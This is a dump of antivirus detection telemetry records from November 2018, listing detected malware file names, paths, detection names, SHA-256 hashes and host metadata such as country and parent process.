  Row(detection=Row(filename='115059913.exe', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\115059913.exe', filesize=35056000, name='WORM/Alien.uqiib.#M1.#R1'), hash='c7ac889a8307930552202d90b7871bbaf0f0ed667230632d69dc2b994c033383', metadata=Row(cmdline='\\\\\\/DB', country='TW', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\IObit\\Driver Booster\\6.0.2\\MlwScan.exe', parentsize=690960, timestamp='2018-11-04T03:51:09Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='115059913.exe', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\115059913.exe', filesize=35056000, name='WORM/Alien.uqiib.#M1.#R1'), hash='c7ac889a8307930552202d90b7871bbaf0f0ed667230632d69dc2b994c033383', metadata=Row(cmdline='\\\\\\/DB', country='TW', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\IObit\\Driver Booster\\6.0.2\\MlwScan.exe', parentsize=690960, timestamp='2018-11-04T03:51:09Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='windowsupdate32.exe', filepath='\\\\?\\C:\\ProgramData\\WindowsUpdater\\WindowsUpdate32.exe', filesize=1600000, name='HEUR/AGEN.1004477.#M1.#R1'), hash='c7d7d681204eba799032f293c34dc6923a94286ac5c59e554a23436055a7ae2a', metadata=Row(cmdline=None, country='RU', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T11:30:26Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='windowsupdate32.exe', filepath='\\\\?\\C:\\ProgramData\\WindowsUpdater\\WindowsUpdate32.exe', filesize=1600000, name='HEUR/AGEN.1004477.#M1.#R1'), hash='c7d7d681204eba799032f293c34dc6923a94286ac5c59e554a23436055a7ae2a', metadata=Row(cmdline=None, country='RU', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T07:28:14Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='corel visual intelligence 1.0 1.0 by iwdownload.exe', filepath='P:\\cdr\\2017\\apneu\\breath\\dir-001\\mediq\\Corel Visual Intelligence 1.0 1.0 by iwdownload.exe', filesize=668000, name='PUA/InstallCore.Gen7.#M300.#R600538'), hash='c807c705aa5ff0b78eb10315fff7a3798d28fad037061eb027346baaf5943d1b', metadata=Row(cmdline=None, country='NL', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\totalcmd850\\TOTALCMD64.EXE', parentsize=8937608, timestamp='2018-11-04T18:16:09Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='biên bản thi đua cả năm.exe', filepath='G:\\\xa0\\NGUYEN Ổ C\\Biên bản thi đua cả năm.exe', filesize=1728000, name='TR/ATRAPS.Gen4.#M300.#R300784'), hash='c829f0471fd190f70d78fed3b4c56e3306cae681025cefafefe6036d572695f6', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\Microsoft Security Client\\MsMpEng.exe', parentsize=119864, timestamp='2018-11-04T10:46:34Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='biên bản thi đua cả năm.exe', filepath='G:\\\xa0\\NGUYEN Ổ C\\Biên bản thi đua cả năm.exe', filesize=1728000, name='TR/ATRAPS.Gen4.#M300.#R300784'), hash='c829f0471fd190f70d78fed3b4c56e3306cae681025cefafefe6036d572695f6', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\Microsoft Security Client\\MsMpEng.exe', parentsize=119864, timestamp='2018-11-04T10:14:11Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='biên bản thi đua cả năm.exe', filepath='G:\\\xa0\\NGUYEN Ổ C\\Biên bản thi đua cả năm.exe', filesize=1728000, name='TR/ATRAPS.Gen4.#M300.#R300784'), hash='c829f0471fd190f70d78fed3b4c56e3306cae681025cefafefe6036d572695f6', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\Microsoft Security Client\\MsMpEng.exe', parentsize=119864, timestamp='2018-11-04T11:19:24Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='c832ed6b008734995ebe31a3cf48e229e9d40a3cdeaf74e8e319c47e4f7a251c', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries_31.10.2018-32.categorizing\\C832ED6B008734995EBE31A3CF48E229E9D40A3CDEAF74E8E319C47E4F7A251C', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='c832ed6b008734995ebe31a3cf48e229e9d40a3cdeaf74e8e319c47e4f7a251c', metadata=Row(cmdline='-r', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\Kaspersky Lab\\Kaspersky Internet Security 18.0.0\\avp.exe', parentsize=354672, timestamp='2018-11-04T11:29:48Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='e9f7f16dd307f468c3c2d5904537ec334b9e95f5', filepath='\\\\?\\c:\\users\\X\\appdata\\local\\temp\\2\\e9f7f16dd307f468c3c2d5904537ec334b9e95f5', filesize=320000, name='Adware/DealPly.c83b23.#M1.#R1'), hash='c83b23c2f0fff51a0a70ce0b09a4c942b07da63cd80bff5c50c04e461a71d943', metadata=Row(cmdline=None, country='US', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T18:09:30Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-135035-30e30d5a', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_3272e11a\\AVSCAN-20181104-134818-228F6BDB\\AVSCAN-20181104-135035-30E30D5A', filesize=5444000, name='PUA/Systweak.#M1.#R1'), hash='c8f28ea521eb29b88e8279c4e7b5df617cf50c64764bde1a443883b3a13046be', metadata=Row(cmdline=None, country='AR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T16:50:37Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='searchprotocolhost.exe', filepath='C:\\Windows\\System32\\SearchProtocolHost.exe', filesize=192000, name='W32/Virut.Gen.#M1.#R1'), hash='c912c273fb904f78f14f15381f38cd1f67c6e42e58904710324f4dc74002a916', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T18:03:40Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='fax_msg453-699-9474.doc', filepath='C:\\TMP\\01\\_virs\\fax_msg453-699-9474.doc', filesize=64000, name='W97M/Agent.960461927.#M1.#R1'), hash='c9647a160a66b9d95f7b91c414b64549df218b2eadd252c4b1ed2d52cc6b4b7c', metadata=Row(cmdline=None, country='SK', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T12:47:21Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='label_84884476.doc', filepath='C:\\TMP\\01\\_virs\\label_84884476.doc', filesize=64000, name='W97M/Agent.960461927.#M1.#R1'), hash='c9647a160a66b9d95f7b91c414b64549df218b2eadd252c4b1ed2d52cc6b4b7c', metadata=Row(cmdline=None, country='SK', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T12:47:24Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='label_44796569.doc', filepath='C:\\TMP\\01\\_virs\\label_44796569.doc', filesize=64000, name='W97M/Agent.960461927.#M1.#R1'), hash='c9647a160a66b9d95f7b91c414b64549df218b2eadd252c4b1ed2d52cc6b4b7c', metadata=Row(cmdline=None, country='SK', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T12:47:24Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='eauninstall.exe', filepath='\\\\?\\F:\\Removable Disk\\Rovio\\NFS MW\\eauninstall.exe', filesize=512000, name='HEUR/APC.#M1.#R1'), hash='ca227ae63918b62481fad37283c4f6bc0790a86107534a52f5080c08207bf7cc', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T14:59:49Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='searchprotocolhost.exe', filepath='C:\\Windows\\System32\\SearchProtocolHost.exe', filesize=192000, name='W32/Virut.Gen.#M1.#R1'), hash='ca8b8c22d41620d3d1d05f30e5c3930514f539c06452b4a5ba4689cb5dc68530', metadata=Row(cmdline='\\\\\\/Embedding', country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\SearchIndexer.exe', parentsize=428032, timestamp='2018-11-04T23:34:58Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='searchprotocolhost.exe', filepath='C:\\Windows\\System32\\SearchProtocolHost.exe', filesize=192000, name='W32/Virut.Gen.#M1.#R1'), hash='ca8b8c22d41620d3d1d05f30e5c3930514f539c06452b4a5ba4689cb5dc68530', metadata=Row(cmdline='-k LocalSystemNetworkRestricted', country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\svchost.exe', parentsize=20992, timestamp='2018-11-04T23:30:04Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='libglesv2.dll', filepath='C:\\Users\\X\\AppData\\Local\\Chromium\\Application\\58.0.2991.0\\libglesv2.dll', filesize=2304000, name='W32/Ramnit.CD.#M1.#R1'), hash='caa40d5eef7d06c4bb7eaffa86449a434bbc5aa943bca82d2e8d7b8d8a0db9ed', metadata=Row(cmdline='\\\\\\/restart \\\\\\/minimized \\\\\\/froma', country='VE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\ByteFence\\ByteFence.exe', parentsize=3711816, timestamp='2018-11-04T05:09:47Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-210037-5d7a48e7', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_eb77e4c9\\AVSCAN-20181104-210000-5960DD46\\AVSCAN-20181104-210037-5D7A48E7', filesize=1536000, name='TR/Dropper.Gen.#M1.#R1'), hash='cac04bd9f620e52722910d4cb065245cdd766dce4430e4ccaf0691bc35bab5bf', metadata=Row(cmdline=None, country='MD', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T19:00:36Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='flashupdate (7).exe', filepath='C:\\Users\\X\\Downloads\\flashupdate (7).exe', filesize=1536000, name='TR/Dropper.Gen.#M300.#R3467'), hash='cac04bd9f620e52722910d4cb065245cdd766dce4430e4ccaf0691bc35bab5bf', metadata=Row(cmdline='\\\\\\/FromInstall', country='MD', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\Auslogics\\Anti-Malware\\AntiMalware.exe', parentsize=1906248, timestamp='2018-11-04T18:58:30Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='flashupdate (6).exe', filepath='C:\\Users\\X\\Downloads\\flashupdate (6).exe', filesize=1536000, name='TR/Dropper.Gen.#M300.#R3467'), hash='cac04bd9f620e52722910d4cb065245cdd766dce4430e4ccaf0691bc35bab5bf', metadata=Row(cmdline='\\\\\\/FromInstall', country='MD', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\Auslogics\\Anti-Malware\\AntiMalware.exe', parentsize=1906248, timestamp='2018-11-04T18:58:30Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-210031-5cc0b308', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_eb77e4c9\\AVSCAN-20181104-210000-5960DD46\\AVSCAN-20181104-210031-5CC0B308', filesize=1536000, name='TR/Dropper.Gen.#M1.#R1'), hash='cac04bd9f620e52722910d4cb065245cdd766dce4430e4ccaf0691bc35bab5bf', metadata=Row(cmdline=None, country='MD', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T19:00:29Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-210048-5ea03e9a', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_eb77e4c9\\AVSCAN-20181104-210000-5960DD46\\AVSCAN-20181104-210048-5EA03E9A', filesize=1536000, name='TR/Dropper.Gen.#M1.#R1'), hash='cac04bd9f620e52722910d4cb065245cdd766dce4430e4ccaf0691bc35bab5bf', metadata=Row(cmdline=None, country='MD', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T19:00:46Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-210027-5c5f0fd9', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_eb77e4c9\\AVSCAN-20181104-210000-5960DD46\\AVSCAN-20181104-210027-5C5F0FD9', filesize=1536000, name='TR/Dropper.Gen.#M1.#R1'), hash='cac04bd9f620e52722910d4cb065245cdd766dce4430e4ccaf0691bc35bab5bf', metadata=Row(cmdline=None, country='MD', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T19:00:26Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='flashupdate (5).exe', filepath='C:\\Users\\X\\Downloads\\flashupdate (5).exe', filesize=1536000, name='TR/Dropper.Gen.#M300.#R3467'), hash='cac04bd9f620e52722910d4cb065245cdd766dce4430e4ccaf0691bc35bab5bf', metadata=Row(cmdline='\\\\\\/FromInstall', country='MD', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\Auslogics\\Anti-Malware\\AntiMalware.exe', parentsize=1906248, timestamp='2018-11-04T18:58:29Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='flashupdate (4).exe', filepath='C:\\Users\\X\\Downloads\\flashupdate (4).exe', filesize=1536000, name='TR/Dropper.Gen.#M300.#R3467'), hash='cac04bd9f620e52722910d4cb065245cdd766dce4430e4ccaf0691bc35bab5bf', metadata=Row(cmdline='\\\\\\/FromInstall', country='MD', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\Auslogics\\Anti-Malware\\AntiMalware.exe', parentsize=1906248, timestamp='2018-11-04T18:58:29Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='cae108464dd278b34f958dbb74ffefe382ef99e74b048bb4ae1be95671688a2f', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries_31.10.2018-32.categorizing\\CAE108464DD278B34F958DBB74FFEFE382EF99E74B048BB4AE1BE95671688A2F', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='cae108464dd278b34f958dbb74ffefe382ef99e74b048bb4ae1be95671688a2f', metadata=Row(cmdline='-r', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\Kaspersky Lab\\Kaspersky Internet Security 18.0.0\\avp.exe', parentsize=354672, timestamp='2018-11-04T12:34:19Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='crossword twist.exe', filepath='D:\\العاب\\small games\\Crossword Twist\\Crossword Twist.exe', filesize=2944000, name='W32/Jeefo.A.#M1.#R1'), hash='cb1ab252cb6f209b71a14f871b4ba19f38dfcfe5cdc5a5b8442f9d9f64124ed0', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\svchost.exe', parentsize=36352, timestamp='2018-11-04T12:58:30Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='agm.dll', filepath='C:\\Program Files\\Adobe\\Acrobat 9.0\\Acrobat\\agm.dll', filesize=5760000, name='W32/Ramnit.CD.#M1.#R1'), hash='cc465ed7f2e62b4ab474979ff5ecd27af4da2969c06384a4db099a2c34e25d9f', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\Adobe\\Acrobat 9.0\\Acrobat\\acrobat_sl.exe', parentsize=37232, timestamp='2018-11-04T04:25:11Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='agm.dll', filepath='C:\\PROGRAM FILES\\ADOBE\\ACROBAT 9.0\\Acrobat\\AGM.dll', filesize=5760000, name='W32/Ramnit.CD.#M1.#R1'), hash='cc465ed7f2e62b4ab474979ff5ecd27af4da2969c06384a4db099a2c34e25d9f', metadata=Row(cmdline='aepdu.dll,AePduRunUpdate', country='IN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\rundll32.exe', parentsize=44544, timestamp='2018-11-04T05:01:40Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='autmata..exe', filepath='C:\\Users\\X\\Downloads\\descargas\\Autmata..exe', filesize=476000, name='HEUR/AGEN.1014028.#M1.#R1'), hash='cca939933535d17781df181347898638c06e7c8e4685e338b955b65c93437cc6', metadata=Row(cmdline=None, country='ES', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=3229696, timestamp='2018-11-04T18:44:08Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-194526-516c9023', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_d6ecda6b\\AVSCAN-20181104-194430-4890193E\\AVSCAN-20181104-194526-516C9023', filesize=476000, name='ADWARE/Adware.Gen.#M300.#R5899'), hash='cca939933535d17781df181347898638c06e7c8e4685e338b955b65c93437cc6', metadata=Row(cmdline=None, country='ES', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T18:45:27Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='searchprotocolhost.exe', filepath='C:\\Windows\\System32\\SearchProtocolHost.exe', filesize=192000, name='W32/Virut.Gen.#M1.#R1'), hash='ccc1f5845bd9dd99ec37a2f679617712d32e1d4db090546cd37c91cca55624ec', metadata=Row(cmdline='-k LocalSystemNetworkRestricted', country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\svchost.exe', parentsize=20992, timestamp='2018-11-04T20:50:36Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='searchprotocolhost.exe', filepath='\\\\?\\C:\\Windows\\system32\\SearchProtocolHost.exe', filesize=192000, name='W32/Virut.Gen.#M1.#R1'), hash='ccc1f5845bd9dd99ec37a2f679617712d32e1d4db090546cd37c91cca55624ec', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T19:18:10Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='gmasjidul haram.exe', filepath='d:\\al quran\\quran tafssir in pashto\\gMasjidul Haram.exe', filesize=1792000, name='TR/Patched.Gen.#M300.#R3369'), hash='ccf521520ebef7060baa9ea194a6d9f01f3794db19af1d6846373348a2001799', metadata=Row(cmdline=None, country='AF', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T16:53:11Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-101901-ed34cdc0', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_459c300c\\AVSCAN-20181104-100840-AC4E3947\\AVSCAN-20181104-101901-ED34CDC0', filesize=640000, name='W32/Small.L.#M1.#R1'), hash='cd1f14784298eab8e2aeb3b43979f34069b31deebe17eeac8e1d2d1d75333c54', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-04T03:19:00Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='spare.exe', filepath='\\\\Pc4-pc\\d\\eissa\\Spare.exe', filesize=3072000, name='W32/Alman.BB.#M1.#R1'), hash='cd202229f34648202ed5f2b27759e365031e8a08d3e619597a6b9abf72ef735c', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=2616320, timestamp='2018-11-04T08:00:21Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='beieoo4o.exe', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\Low\\beieoo4o.exe', filesize=192000, name='TR/Crypt.XPACK.Gen2.#M300.#R100626'), hash='cd6d6e31b9479b31b84242c01aa1562f03a4645e40cfa8284eef8991e8002320', metadata=Row(cmdline=None, country='SA', os_name='Windows', os_vmajor='6', os_vminor='2', parentproc=None, parentsize=None, timestamp='2018-11-04T19:42:55Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='jet40sp5_9xnt.exe', filepath='D:\\Scan\\wulan1\\BACKUP\\BMD Street\\hysys 7.3\\aspenONEV7.3dvd1\\aes73\\aspenonev7.3dvd1\\core\\mdac27sp1\\Jet40SP5_9xNT.exe', filesize=2752000, name='W32/Virut.Gen.#M1.#R1'), hash='cda2c430ab5a662b70c25f640f2ad44194a5dfbc9c98580242508f6cec75209c', metadata=Row(cmdline='-service', country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\Webroot\\WRSA.exe', parentsize=3710592, timestamp='2018-11-04T02:59:03Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='thunderbird setup 52.1.1 indo.exe', filepath='G:\\BACKUP-DATA-SINTA\\DATA TGL 4 NOVEMBER 2018\\Thunderbird Setup 52.1.1 Indo.exe', filesize=100000, name='W32/Sality.#M1.#R1'), hash='cdfecd65cb5960286a2e48d02cf59e7472b27b14bbbc9e4bb2bdca3ddb079634', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='5', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T05:26:59Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='searchprotocolhost.exe', filepath='C:\\Windows\\System32\\SearchProtocolHost.exe', filesize=192000, name='W32/Virut.Gen.#M1.#R1'), hash='ce0840c544b73dfca4a44f9b2118657b01ed0c790065af4dec89d3f1972202a5', metadata=Row(cmdline='\\\\\\/Embedding', country='DZ', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\SearchIndexer.exe', parentsize=428032, timestamp='2018-11-04T18:32:09Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='searchprotocolhost.exe', filepath='C:\\Windows\\System32\\SearchProtocolHost.exe', filesize=192000, name='W32/Virut.Gen.#M1.#R1'), hash='ce0840c544b73dfca4a44f9b2118657b01ed0c790065af4dec89d3f1972202a5', metadata=Row(cmdline='\\\\\\/Embedding', country='DZ', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\SearchIndexer.exe', parentsize=428032, timestamp='2018-11-04T16:23:21Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='searchprotocolhost.exe', filepath='C:\\Windows\\System32\\SearchProtocolHost.exe', filesize=192000, name='W32/Virut.Gen.#M1.#R1'), hash='ce0840c544b73dfca4a44f9b2118657b01ed0c790065af4dec89d3f1972202a5', metadata=Row(cmdline='\\\\\\/Embedding', country='DZ', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\SearchIndexer.exe', parentsize=428032, timestamp='2018-11-04T16:05:26Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='searchprotocolhost.exe', filepath='C:\\Windows\\System32\\SearchProtocolHost.exe', filesize=192000, name='W32/Virut.Gen.#M1.#R1'), hash='ce0840c544b73dfca4a44f9b2118657b01ed0c790065af4dec89d3f1972202a5', metadata=Row(cmdline='\\\\\\/Embedding', country='DZ', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\SearchIndexer.exe', parentsize=428032, timestamp='2018-11-04T17:30:38Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='enscript.exe', filepath='\\\\?\\C:\\Program Files (x86)\\Evernote\\Evernote\\ENScript.exe', filesize=2368000, name='W32/Sality.AT.#M1.#R1'), hash='ce5dd91482afb7e212d23039ff05048047e91b9e4f9a909e41d0cd7925528c2c', metadata=Row(cmdline=None, country='ZA', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T08:55:38Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='5954814.exe', filepath='\\\\?\\C:\\Program Files (x86)\\gzpem\\5954814.exe', filesize=1024000, name='Adware/CsdiMonetize.dxckt.#M1.#R1'), hash='ce7558dac4c120340a90ea7e57498f2e5b5d40aa5f3ed1ee6c161bdfcd1b8009', metadata=Row(cmdline=None, country='RO', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T21:10:49Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='4352874.vir', filepath='\\\\?\\C:\\Program Files (x86)\\gzpem\\4352874.VIR', filesize=1024000, name='Adware/CsdiMonetize.dxckt.#M1.#R1'), hash='ce7558dac4c120340a90ea7e57498f2e5b5d40aa5f3ed1ee6c161bdfcd1b8009', metadata=Row(cmdline=None, country='BR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T10:29:10Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='2945136.exe', filepath='C:\\Program Files (x86)\\gzpem\\2945136.exe', filesize=1024000, name='Adware/CsdiMonetize.dxckt.#M1.#R1'), hash='ce7558dac4c120340a90ea7e57498f2e5b5d40aa5f3ed1ee6c161bdfcd1b8009', metadata=Row(cmdline='-m:appraiser.dll -f:DoScheduledTelemetryRun -cv:Un+USuSfFkW05TtP.1', country='BR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Windows\\System32\\CompatTelRunner.exe', parentsize=None, timestamp='2018-11-04T14:43:02Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-104528-75d086e3', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_62c1c742\\AVSCAN-20181104-104402-6BDFBD1B\\AVSCAN-20181104-104528-75D086E3', filesize=1024000, name='Adware/CsdiMonetize.dxckt.#M1.#R1'), hash='ce7558dac4c120340a90ea7e57498f2e5b5d40aa5f3ed1ee6c161bdfcd1b8009', metadata=Row(cmdline=None, country='BR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T14:45:27Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='a6a635a93c9e2c84b1066a3527b6c9f9.smp', filepath='\\\\192.168.10.10\\SHARED\\_tools\\runtime\\scan\\tmp_675556641\\a6a635a93c9e2c84b1066a3527b6c9f9.smp', filesize=192000, name='HEUR/AGEN.1004975.#M1.#R1'), hash='ce927702017386e17527a625696e990c7193fc7f7cf4e61fcd15d9282ca835db', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\tools\\http_server\\http_server.exe', parentsize=6242816, timestamp='2018-11-04T16:39:36Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-210712-6b906423', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_5129c324\\AVSCAN-20181104-210448-584E1AA5\\AVSCAN-20181104-210712-6B906423', filesize=320000, name='TR/AD.CoinMiner.xxwsa.#M1.#R1'), hash='ced46d99ebf179274add883a3e6a7ad3c3ecf4cd739ea540de0f7a8c9bd3c44b', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T20:07:12Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-210626-656fcaf0', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_5129c324\\AVSCAN-20181104-210448-584E1AA5\\AVSCAN-20181104-210626-656FCAF0', filesize=320000, name='TR/AD.CoinMiner.xxwsa.#M1.#R1'), hash='ced46d99ebf179274add883a3e6a7ad3c3ecf4cd739ea540de0f7a8c9bd3c44b', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T20:06:27Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-210729-6dbffa74', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_5129c324\\AVSCAN-20181104-210448-584E1AA5\\AVSCAN-20181104-210729-6DBFFA74', filesize=320000, name='TR/AD.CoinMiner.xxwsa.#M1.#R1'), hash='ced46d99ebf179274add883a3e6a7ad3c3ecf4cd739ea540de0f7a8c9bd3c44b', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T20:07:29Z'), dt=datetime.date(2018, 11, 4)),
